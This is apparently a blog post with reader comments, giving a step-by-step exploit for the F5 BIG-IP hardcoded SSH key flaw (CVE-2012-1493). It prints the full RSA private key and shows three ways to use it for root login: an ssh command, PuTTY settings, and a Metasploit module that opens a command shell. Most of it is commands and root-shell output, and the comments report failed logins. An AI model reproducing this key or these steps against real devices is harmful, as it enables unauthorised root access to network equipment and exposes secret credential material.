# Exploiting F5 BIG-IP SSH vulnerability

Introduction

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1493
http://support.f5.com/kb/en-us/solutions/public/13000/600/sol13600.html

Option 1: Command-line

# cat f5_private_key 
-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----
# chmod 0600 f5_private_key
# ssh -i f5_private_key root@192.168.1.1
[root@F5-BIG-IP:Active] config # bigpipe platform | grep Platform
|     BIOS revision: F5 Platform: C103 OBJ-0335-01 BIOS (build: 130) Date: 09/12/09
[root@F5-BIG-IP:Active] config # bigpipe version | grep Version
BIG-IP Version 10.2.2 969.0
[root@F5-BIG-IP:Active] config # whoami
root

Option 2: PuTTY

- Use PuTTYGen to obtain a private ppk file from f5_private_key
- Execute PuTTY
- Connection/SSH/Auth/Private key file for authentication/Browse...: C:\f5_private_key.ppk
- Session/Host Name (or IP address) and Port: 192.168.1.1:22
- Open

login as: root
Authenticating with public key "imported-openssh-key"
[root@F5-BIG-IP:Active] config # whoami
root

Option 3: Metasploit

# msfconsole

msf > use exploit/linux/ssh/f5_bigip_known_privkey
msf  exploit(f5_bigip_known_privkey) > show payloads
msf  exploit(f5_bigip_known_privkey) > set payload cmd/unix/interact
msf  exploit(f5_bigip_known_privkey) > set lhost 192.168.1.2
msf  exploit(f5_bigip_known_privkey) > set rhost 192.168.1.1
msf  exploit(f5_bigip_known_privkey) > exploit

[+] Successful login
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.2:42298 -> 192.168.1.1:22)

whoami
root

2 comments:

Anonymous said...

i followed your step, but i get error :
SSH - Failed authentication

do you know what the mistake?
thanks...

Anonymous said...

Tried 1st and 3rd options but unable to login.
Again it's asking for credentials...
Any idea how to resolve to access using privkey